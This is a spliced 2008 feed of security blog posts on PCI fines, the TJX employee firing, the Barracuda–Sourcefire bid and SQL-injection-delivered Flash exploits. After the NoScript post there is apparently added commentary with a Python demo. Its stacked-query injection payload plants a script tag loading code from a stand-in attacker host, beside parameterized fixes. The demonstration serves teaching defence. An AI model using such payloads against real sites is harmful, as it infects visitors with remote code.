Spliced feed for Security Bloggers Network |
Separation of duties is a tool, not a goal [Kees Leune] Posted: 31 May 2008 09:27 PM CDT

Separation of duty is one of the most powerful tools an information security professional has. But that is exactly what it is: a tool, not a goal.

My family and I live in a very safe suburban neighborhood. The incorporated village has its own police force, and most of the village's budget is spent on it. Much to my surprise, we have become more and more aware of suspicious activities at a house in our area; cars pull up at the strangest hours and leave again within 5 minutes. Usually someone walks over from the car to the house, a handshake is exchanged and the visiting party leaves. Sounds like there is some trade in "stuff" going on.

As with most people, we are not too happy that this is happening on our doorstep. We have repeatedly called the local police department and even had house visits by detectives who were trying to figure out, from our witness statements, what might be going on. The last house visit ended with the detectives reassuring us to call whenever. Much to our chagrin, whenever we have called we cannot get past a dispatcher who knows nothing about the case and refuses to forward our calls to the detectives.

Today was a new record; as we witnessed another exchange, we called the police department. The response? "Sorry, the detectives do not work on Saturday. Please call back Monday after 9am to file your report." Excuse me?!

It gets "funnier". This time, the car that pulled up was a street-racer model; lots of engine revs and loud music. Our next-door neighbors also called dispatch to complain about the loud noise. Guess what? Within 5 minutes, three marked police cars showed up on the scene to check out what was going on!

I understand that detectives do investigations; just like in information technology, it is the information security officer who does the investigation and the field support techs who take the general calls. But please; separation of duty is a tool, not a goal. When the dispatcher chooses to send three squad cars to a noise complaint, but none to an alleged drug deal, something is wrong in this world. |
Satellite Hacker Tells All [Liquidmatrix Security Digest] Posted: 31 May 2008 12:45 PM CDT From Wired…
Tip of the hat to Adam for this one Tags: satellite hacking |
Posted: 31 May 2008 08:47 AM CDT Solid “B” work here guys and not trying to make you feel bad about you…but, making the “could have done better” face in your direction:
Read why Chinese hackers can’t break that remaining 12%… |
Look to the acquiring banks, not the PCI Security Council [Network Security Blog] Posted: 31 May 2008 02:12 AM CDT

Alan is continuing the conversation about the firing at TJX and reporting Payment Card Industry ‘violations’ to someone. I want to pause the conversation for a moment to clear up a few misconceptions.

The PCI Security Council has no power to fine and is only responsible for maintaining the PCI Data Security Standards and administering the assessment process. They set the standards and keep track of who’s compliant (or not). That’s about it. They have a lot of power to influence the security industry. They have complete control over the assessment process. But what the PCI Security Standards Council does not have is a direct means to fine a company for not being compliant. There is almost no direct relationship between the PCI Council and the businesses taking credit cards.

The credit card companies never fine a merchant directly, since their relationship is with the acquiring bank, not the merchant. In simplest terms, the acquiring bank takes the credit card information from the merchant and gives the merchant his money, minus a small fee. The acquiring bank, the PCI Council and the credit card companies all have direct relationships. Only the acquiring bank has a relationship with the merchant. The credit card companies can fine an acquiring bank, but don’t fine a merchant directly, though that cost is usually passed through to the merchant in some form. If a merchant suffers a compromise or is non-compliant, the acquiring bank has several punitive options, including raising the per-transaction fee or levying a fine. Most merchants would rather receive a fine than raised fees; for medium and large businesses the fine would be much less painful than a .25% raise in their per-transaction fees. .25% of several hundred million dollars is still a lot of money. The acquiring bank can also choose to absorb the loss.

The acquiring bank has the power to make a company hurt if they’re not compliant or suffer a compromise, the ‘teeth’ Alan’s looking for. There isn’t much direct evidence of how much the acquiring banks are fining companies, and what we saw happen with the first TJX incident wasn’t inspiring. Visa fined the acquiring bank $880,000, which will likely be passed along in one form or another. But we, the public, don’t know the specifics of what TJX was fined because there is no reporting requirement. Even working in the industry, all I know of the fines is from the press.

The bottom line is, the PCI process has teeth. They’re being used quietly by the acquiring bank as part of the business processes. It’s a monetary issue from start to finish; there are no legal requirements. Would I like to know what the fines being levied against companies are? Yes, and I’d like to have enough information to understand the effectiveness of the PCI Standards. But there’s no fiscal incentive for any of the parties involved to disclose fine information to the public, so don’t expect to see it any time soon. Just because we don’t see the teeth doesn’t mean they’re not there, though. And as far as I can tell, there’s no way for the public to get in touch directly with the acquiring banks. |
Leave Sourcefire Alone! [NP-Incomplete] Posted: 31 May 2008 01:54 AM CDT Apparently Barracuda, the SpamAssassin + ClamAV in a box company and perennial purchasers of godforsaken airport advertising space, is trying to eat SourceFire, the people who own ClamAV. I am debating making a Leave-Britney-Alone style video as a response. Trust me, no one wants to see that.* * In interest of full disclosure, I do hold FIRE in my portfolio. |
Bad marketing department! Bad! No bagel day! [NP-Incomplete] Posted: 31 May 2008 01:38 AM CDT Hoff had a post about a VirtSec startup known as Hyperbole. Their product/feature names include such gems as HyperTension, HyperSensitivity, and HyperVentilated. ... All I can think is of some CSO three years from now muttering "I bought HyperTension and all I got was hypertension." |
Links for 2008-05-30 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"] Posted: 31 May 2008 12:00 AM CDT |
physical access pwns you again...China +1 [Carnal0wnage Blog] Posted: 30 May 2008 07:33 PM CDT unconfirmed but completely believable: "Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez. Commerce Secretary Carlos Gutierrez's visit to China has raised security questions. The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers. The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended. When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, "We take security seriously, and as we learn of concerns about security, we look into them." This kind of stuff has been going on for years to businessmen, and who's to blame them if some jackass leaves a laptop unattended. http://www.thedarkvisitor.com/2008/05/lose-a-laptopget-hacked-sigh/ http://www.nationaljournal.com/njmagazine/cs_20080531_6948.php |
Barracuda buying Sourcefire? When Hell(FIRE) freezes over! [Security Incite Rants] Posted: 30 May 2008 11:08 AM CDT Yesterday the folks from Barracuda announced an unsolicited takeover attempt of Sourcefire. They are proposing a 13% premium and think they can "fix" some of the execution problems that have plagued FIRE since they went public. I'm sure the fish aren't laughing, but everyone else in the industry is. This deal isn't going to happen, not in its current form anyway. Here are a couple of points that create serious headwind for the deal:
So Sourcefire was correct in rejecting the deal and not even sitting down. If Barracuda was serious, they would have proposed a much higher premium and had a more effectively communicated strategy for the combined entity. They could have taken a page from Microsoft (62% premium for Yahoo) and IBM (huge premium for Lotus back in the day) and proposed a number that would be hard to walk away from. They didn't. But let's be clear - that's not what this deal was about. This is another example of why Barracuda may be the most effectively marketed security company out there. For the cost of a press release and some legal fees, they are going to be the talk of the town, even if Howie Mandel is just saying "No Deal!" You have to figure that Barracuda is angling for a public offering in the near term (once the markets right themselves) and this is a great way to get some visibility with the investors that are likely to invest in their IPO. A 13% premium is a joke. But as a PR and investor relations strategy, it's brilliant.
|
Event Planner: Gartner IT Security Summit [Liquidmatrix Security Digest] Posted: 30 May 2008 09:53 AM CDT In case there are any readers who might recognize me, you’ll be able to find me at the Gartner IT Security Summit next week (June 2 -3). I’m hoping to learn something quadranty.
Check my Twitter for updates on where I am and what’s good or bad. Tags: conferences, gartner, gartner it security summit, gaylord national resort |
Security Briefing: May 30th [Liquidmatrix Security Digest] Posted: 30 May 2008 09:29 AM CDT What a week - it’s like I’m swimming uphill both ways and it’s snowing. An extra large helping of news to make up for being late this morning. And hey - thanks to all of our new subscribers that joined us yesterday. Welcome! Click here to subscribe to Liquidmatrix Security Digest! And now, the news…
Tags: News, Daily Links, Security Blog, Information Security, Security News |
I didn’t sign nothing (NDA) [Network Security Blog] Posted: 30 May 2008 08:48 AM CDT As Public Relations folks continue to embrace bloggers and treat us more like press, I get more and more press releases and opportunities to talk to the people at security companies. I enjoy getting this information and appreciate talking to these companies as an analyst/press. But I have to laugh sometimes when they pull stupid stunts, like putting the phrase ‘Under NDA’ in the middle of a presentation. If I didn’t sign any paperwork, the only thing obligating me to that Non-Disclosure Agreement is common courtesy, something PR people need to be very careful of expecting as they dip their toes in the blogosphere. Something that PR people, as well as bloggers, are still figuring out is the exact nature of the relationship between the two groups. PR professionals are used to building relationships with reporters and knowing exactly who they’re talking to. With bloggers they don’t have that relationship, they don’t even necessarily know the name of the person they’re dealing with. On the flip side, most bloggers have no idea how to react to invitations and press releases from PR agencies. The reactions can range from completely ignoring PR to maliciously using the information provided. I suspect most of us lean towards the ‘ignore them and they’ll go away’ camp. I used to ignore most press releases, but I started changing that recently. Blogging is about communication and learning, both of which are the exact thing PR people are trying to provide. I’ve started responding to some press releases, letting the PR folks know if I find their press releases relevant or not. I’m trying to build some of the same relationships ‘real’ reporters have and making PR aware of my interests is part of that. But the relationship has to go both ways; PR folks need to communicate little things like the expectation of not releasing product information prior to the products release date. 
In this case, it’s not a big deal: the product will be out next Monday. But when I saw the NDA statement cleverly slipped into the presentation, part of me wanted to post about it right away just out of spite. Luckily the larger, more responsible part of me decided it’d be a poor treatment of the company. Bloggers and PR folks have a lot of learning to do about one another. We have to understand that PR professionals have access to a lot of valuable information we might not be able to get elsewhere. PR professionals need to realize that bloggers are not reporters, we don’t have the background a reporter does and in many cases a quick flash of popularity and traffic is more important to us than a ‘relationship’ with a PR firm. If you want something to be under Non-Disclosure Agreement, ask up front if a blogger is willing to respect a verbal NDA. But don’t slip it into a slide in your presentation and expect it to be honored. |
Who you gonna run to? [Network Security Blog] Posted: 30 May 2008 12:59 AM CDT

Alan Shimel faults me for saying sometimes you just have to walk away, in reference to TJX firing Cryptic_Mauler (the upper/lower case stuff is too much for me to type again and again). Alan talks about illegal behavior, turning your employer in to the authorities, standing up for your morals to do what’s right. Of course, he ignores the fact that nothing TJX is being accused of is illegal; stupid, yes, but not illegal. And the fact is there’s no one to turn TJX in to, not in the government and certainly not at the PCI Security Council or the major credit card companies.

Cryptic_Mauler was in an untenable situation: his employer was practicing the worst sort of security, they didn’t want to change, and there’s no one he could report them to. Alan wishes there were someone CM could have reported TJX’s woefully inadequate security practices to, but if such an entity exists, I’ve never heard of one. The best thing he could have done was report the problem to TJX’s acquiring bank, but unless you’re really into credit card processing, the chances are you’ve never even heard of an acquiring bank, let alone have any idea of who to call.

I like Alan, but asking me why I didn’t list reporting TJX to the authorities as an option is like asking me when was the last time I spoke to the Easter Bunny! Neither one exists! (my kids don’t read this, so I can say that). It’s fine to talk about taking the high moral ground when you’re living in a fantasy world, but the reality I live in doesn’t have anyone Cryptic_Mauler could have gone to to report TJX. I really wish it did; I could have used them myself in the past.

And why doesn’t the PCI Security Council have some way of reporting offending companies? I’ll hazard a guess and say they’ve probably talked about establishing just such a capability and decided against it in the strongest possible way. After all, if they had a way for someone to report violations to, that’d make the Council responsible for acting on those reports. And that’s something they really, really don’t want. But that’s only a guess. |
Lose a laptop…get hacked? Sigh… [The Dark Visitor] Posted: 29 May 2008 10:33 PM CDT Not sure if this even qualifies as a post but, whatevah:
|
Then it all went black…Chinese hackers shutting out the lights? [The Dark Visitor] Posted: 29 May 2008 10:24 PM CDT I have no words…
|
Keynote Speakers for The Last Hope Announced [Liquidmatrix Security Digest] Posted: 29 May 2008 08:46 PM CDT Just a heads up — Liquidmatrix Security Digest will be at The Last Hope. There may even be some shwag available.
… and since I’m temporarily in charge — shwag is only available to those who recognize me. |
Security Brieflet (the late edition): May 29th [Liquidmatrix Security Digest] Posted: 29 May 2008 06:57 PM CDT A couple of interesting stories over the course of the day… Comcast Defaced (for a short while) I can’t say that I’m all that saddened… it is Comcast after all. Banks don’t disclose all breaches I’d love to argue this one, but I’ve known too many bankers. Back with more Liquidmatrix Love in the morning folks, the night is young and I’ve got work-related documentation to produce. Tags: information security news, opinion |
Disclosing in a public forum is not whistle blowing [Network Security Blog] Posted: 29 May 2008 04:02 PM CDT

Last week TJX fired one of their employees for disclosing on ha.ckers.org that TJX is using blank passwords and other very insecure procedures. Posting in what he thought was an anonymous manner, CrYpTiC_MauleR was tracked down by management at TJX through his ISP, asked what he felt is wrong with the TJX network and fired. And as bad as I feel for him personally, I think TJX did the right thing.

Don’t get me wrong, I have very little sympathy for a company like TJX. They had one of the biggest credit card breaches in history, they’ve been put through the wringer and they still have the temerity to allow such bad practices as blank passwords and running servers as admin. I’m hoping TJX’s acquiring bank, PCI assessor and Visa/Mastercard get wind of these issues and call them on the carpet for it. But I don’t excuse the actions of Cryptic_Mauler. I’ve read most of the thread on sla.ckers.org, and this appears to be an issue of venting frustration, not whistle blowing. If Cryptic_Mauler was talking to federal investigators or maybe even a reporter, I might call it whistle blowing, but by disclosing it in a security forum, it was simply a way of pointing the finger at the stupidity of his employer. It’s not a case of full disclosure either, since that usually refers to

We’ve all been in situations where we have employers doing stupid things. We do our best to communicate with management about the problems and hope they react appropriately. The problem is, our perception of ‘appropriately’ and management’s is often very different. What we see as a horrible security hole, they may see as another minor problem that would take major money to fix. Or just as something that they don’t want to think about right now.

There’s no reporting mechanism built into the Payment Card Industry standards. To the best of my knowledge, there’s no clear-cut method to report a company that has bad practices to the credit card companies or the government at all. There’s not even a press person you can talk to about the issues to bring them to public awareness. It’s frustrating because, despite their known issues, TJX is probably far from the worst offender and there needs to be a way to make these people sit up and take notice. But that’s no excuse for posting the issues with the TJX network in a public forum.

Cryptic_Mauler isn’t a security professional. He wasn’t even a part of the IT team. But he was an employee of the company and as such was held to certain expectations. Keeping internal company issues internal is one of those expectations. I don’t like how TJX is apparently handling their problems, I don’t like that they aren’t responding more positively to internal criticism, but I don’t see that they could have taken any other action in this circumstance.

I’ve had to resign from a job before because the company wasn’t being responsible in my opinion. I’ve seen companies in the past that shouldn’t be allowed to have computers, let alone an ecommerce site. I’ve been at companies that I wondered how they stayed in business, not even considering their security concerns. But I always tried to react ethically and within the bounds of my moral obligations. I’ve learned that I can do what I can do and sometimes I have to walk away and let someone else deal with the problem. Public disclosure doesn’t fit in my world view of ethics and morality.

It’s frustrating dealing with a company that doesn’t want to change. It’s hard not having leverage to make the changes that you see need to be made. How you react to that frustration is up to you. Do you scream in public like Cryptic_Mauler, keep going until you find someone who can make the change, or do you move on to another opportunity?

I hope Cryptic_Mauler can find a new position somewhere else; I hope the limited notoriety this incident gives him will help him further his career. But I think he made a mistake in publicly disclosing TJX’s problems, one I hope doesn’t continue to haunt him. |
As if you needed more reasons to use NoScript: Flash [Network Security Blog] Posted: 29 May 2008 09:50 AM CDT I’ve made no secret of the fact that I’m a big fan of Firefox and the NoScript plugin. I don’t want anything running in my browser that I don’t explicitly approve of. And now with the big rise in sites compromised with the latest Flash exploits, there are more reasons than ever to use NoScript. I don’t use Flashblock myself, but it also comes highly recommended for dealing with this issue. The interesting thing to me is that this attack is a combination of SQL injection against the servers and a payload containing the Flash exploit. If the compromised sites had made the effort to use good coding practices and checked for SQL injections, this wouldn’t be a big deal. Another alternative would have been a web application firewall. This is 2008, not 1998, SQL injection is low hanging fruit on the security tree and most of the sites compromised should have something in place to stop SQL injections. But they don’t, so we have a nice outbreak of Flash exploits. Security Focus stated that there were approximately 20,000 compromised web pages as of Tuesday. That sounds like a lot until you figure out the math and realize that this may mean 2000 or less machines compromised, depending on the average number of pages per system. I guess 2000 doesn’t get the clicks nearly as well as 20,000 does. |
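The post above describes a two-stage attack: SQL injection against the web server plants a script reference in stored page content, and that script then delivers the Flash exploit to every visitor. The following is an added example, not code from the post or from any of the compromised sites. It models the server side of that first stage in Python with an in-memory SQLite database: a page-view counter that pastes the request's page id into SQL text (and runs it through a driver call that honours stacked statements, as the mass-injection worms relied on), next to the same handler written with a bound parameter and with input validation. The sample pages, the `attacker.invalid` hostname and the payload string are all constructed for the demonstration.

```python
import sqlite3

# Hypothetical attacker-controlled host; the script it would serve stands in
# for the Flash exploit payload the post describes.
INJECTED_TAG = '<script src="http://attacker.invalid/flash.js"></script>'

# Constructed malicious "page id": a stacked query that appends the tag to the
# body of every page, in the style of the 2008 mass SQL injection compromises.
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Constructed sample data: a tiny CMS whose page HTML lives in SQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, views INTEGER)"
    )
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?, 0)",
        [(1, "Home", "<p>Welcome</p>"), (2, "About", "<p>About us</p>")],
    )
    return conn


def record_view_vulnerable(conn, page_id_text):
    """BAD: the request value is pasted into the SQL text and executed through
    an API that runs stacked statements, so the attacker's UPDATE runs too."""
    sql = "UPDATE pages SET views = views + 1 WHERE id = " + page_id_text + ";"
    conn.executescript(sql)


def record_view_parameterized(conn, page_id_text):
    """Parameterized: the value is bound as data and never parsed as SQL,
    and sqlite3.execute() refuses more than one statement anyway.
    Returns the number of rows updated (0 when the payload matches nothing)."""
    cur = conn.execute(
        "UPDATE pages SET views = views + 1 WHERE id = ?", (page_id_text,)
    )
    return cur.rowcount


def record_view_validated(conn, page_id_text):
    """Parameterized plus input validation: anything that is not a plain
    integer id is rejected before it reaches the database at all."""
    if not page_id_text.isdigit():
        raise ValueError("page id must be a positive integer")
    cur = conn.execute(
        "UPDATE pages SET views = views + 1 WHERE id = ?", (int(page_id_text),)
    )
    return cur.rowcount


def infected_pages(conn):
    """Ids of pages whose stored HTML now carries an injected script tag."""
    rows = conn.execute(
        "SELECT id FROM pages WHERE body LIKE '%<script%' ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


def demo():
    """Run the payload through each handler on a fresh database."""
    results = {}
    conn = make_db()
    record_view_vulnerable(conn, PAYLOAD)
    results["vulnerable"] = infected_pages(conn)

    conn = make_db()
    results["parameterized_rows"] = record_view_parameterized(conn, PAYLOAD)
    results["parameterized"] = infected_pages(conn)

    conn = make_db()
    try:
        record_view_validated(conn, PAYLOAD)
        results["validated"] = "accepted"
    except ValueError:
        results["validated"] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the concatenated version leaving both pages carrying the injected tag, while the parameterized version updates zero rows and the validated version never issues the query at all. Parameterization alone defeats this payload; the validation step is defence in depth, and is also the cheap check a web application firewall in front of an unfixed site would be applying on the application's behalf.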
Security Briefing: May 29th [Liquidmatrix Security Digest] Posted: 29 May 2008 09:19 AM CDT Wheeeeee… I’d like to take this moment to again bitch and moan about how much work this is — I don’t know how Dave finds the time and I’m not a morning person and I feel really bad and I’ve been busy and I don’t have enough coffee and… yeah. I got nothin. Have a Rockin’ Thursday! Thanks to all of our new subscribers that joined us yesterday. Welcome! Click here to subscribe to Liquidmatrix Security Digest! And now, the news…
Tags: News, Daily Links, Security Blog, Information Security, Security News |